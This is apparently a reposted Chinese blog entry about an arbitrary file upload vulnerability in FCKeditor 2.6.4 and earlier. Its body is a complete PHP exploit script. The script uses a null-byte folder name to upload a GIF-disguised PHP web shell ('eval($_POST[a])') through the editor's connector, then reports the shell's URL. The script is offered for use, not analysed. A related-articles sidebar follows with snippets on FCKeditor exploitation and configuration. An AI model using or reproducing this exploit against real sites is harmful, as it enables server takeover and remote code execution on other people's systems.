fckeditor <= 2.6.4 任意文件上传漏洞

最新推荐文章于 2021-03-10 05:41:28 发布
最新推荐文章于 2021-03-10 05:41:28 发布
阅读量2.9k 收藏
点赞数
分类专栏: Security 
<?
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)


	{
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	print $resp;
	return $resp;
}


function connector_response($html)
{
	global $match;
	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}


print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
	print "\nUsage......: php $argv[0] host path\n";
	print "\nExample....: php $argv[0] localhost /\n";
	print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
	die();


}


$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename  = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";


$payload  = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type:  image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";


$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet	.= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;


print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";


?>


转载地址:http://blog.csdn.net/cnbird2008/article/details/9342127

vba_2001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7056
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 489
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
fckeditor 防止上传非法文件 增加登录判断
10-28
fckeditor 防止上传非法文件 增加登录判断,需要的朋友可以参考下
修改fckeditor文件上传功能步骤
10-30
虽然fckeditor自带了文件上传功能,但感觉自带的不方便使用。
fckeditor php上传文件重命名的设置
10-30
我使用的fckeditor版本是fckeditor2.6.4.fckeditor默认上传文件不没有重命名的,这样的话就很麻烦,有时上传中文的文件或者名称重复的文件就很恼火。
Fckeditor 2.6.4
03-25
NULL 博文链接:https://3w1h.iteye.com/blog/1131555
Asp.net FCKEditor 2.6.3 上传文件没有权限解决方法
10-30
到Fckeditor官方网站下载FredCK.FCKeditorV2.vs2005 (asp.net)
fckeditor2.6.3 for php
07-21
我今天对fckeditor2.6.3作了一下在php环境下的配置,可以在文本中插入图片,本人学习了好久才把它搞定,现在可以把数据上传到数据库中去,现在把它分享出来,大家一起学习学习。。。
FCKeditor_2.6.3+FCKeditor-2.3.rar
02-06
FCKeditor_2.6.3+FCKeditor-2.3.rar
FCKeditor2.6.3文本编辑器
09-07
工程目录下FCKeditor/FCKeditor-v2.6.3/fckeditor/_samples/default.html文件是我根据自己的理解对它的文档进行修改的测试程序,所以只能作为参考,未必正确
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
03-18
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
fckeditor 2.6 php,fckeditor 2.6.4 任意文件上传漏洞
weixin_32691939的博客
03-10 429
描述:fckeditor详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具!利用:error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function...
fckeditor2.6.3编辑器上传文件出现invalid Request
weixin_34341117的博客
07-08 64
在fckconfig.js中找到FCKConfig.LinkBrowseURL将其后面改为:FCKConfig.LinkBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Type=File&amp;Connector=' + encodeURIComponent( FCKConfig.BasePa...
FCKEditor 2.6.3 ASP.NET 图片上传 停留在进度条问题解决
sqq600om
01-15 96
FCKEditor 2.6.3 ASP.NET 图片上传 停留在进度条问题解决 2011年02月22日   最近有个项目用到FCKEditor,载了目前最新版的2.6.3,配置一切OK,调试状态一切OK,发布到服务器(windows server 2003 sp2),问题来了…… 上传图片后页面左下脚出现脚本错误提示,点开可看到是“没有权限”的提示,并且上传窗口一直冻结在进度条状...
fckeditor2.6.3
weixin_34321977的博客
01-04 181
FCKEditor官方下载地址:http://www.fckeditor.net/download  在官方网站下载  FCKeditor 2.6.3: FCKeditor_2.6.3.zip    FCKeditor.Net :FCKeditor.Net_2.6.3.zip    配置方法如下:   一、删除不必要的文件  从官方下载下来的FCKEditor2.6.3大小有3...
fckeditor 2 6 4 任意文件上传漏洞
ytfhjhv的博客
11-12 6372
fckeditor 2 6 4 任意文件上传漏洞
fckeditor文件上传
最新发布
10-10
对于fckeditor文件上传,你可以按照以下步骤进行操作: 1. 配置服务器:确保服务器环境支持文件上传功能,包括启用合适的文件上传功能和设置合适的目录权限。 2. 配置fckeditor:在fckeditor的配置文件中,找到`config.js`,在其中添加以下代码来启用文件上传功能: ```javascript config.filebrowserUploadUrl = '/upload'; // 这里的 '/upload' 是你服务器上处理文件上传的URL地址 ``` 3. 服务器端处理:在你的服务器上创建一个处理文件上传的脚本(如`upload.php`),该脚本负责接收客户端上传的文件并保存到特定位置。你可以使用服务器端编程语言(如PHP、Python等)来实现该脚本。 下面是一个简单的PHP示例: ```php <?php $uploadDir = '/path/to/upload/directory/'; // 这里替换为你希望存储上传文件的目录 if ($_FILES['upload']['error'] === UPLOAD_ERR_OK) { $tmpName = $_FILES['upload']['tmp_name']; $fileName = $_FILES['upload']['name']; // 检查文件类型、大小等其他验证 if (move_uploaded_file($tmpName, $uploadDir . $fileName)) { // 文件上传成功 echo '文件上传成功'; } else { // 文件上传失败 echo '文件上传失败'; } } else { // 文件上传失败 echo '文件上传失败'; } ?> ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值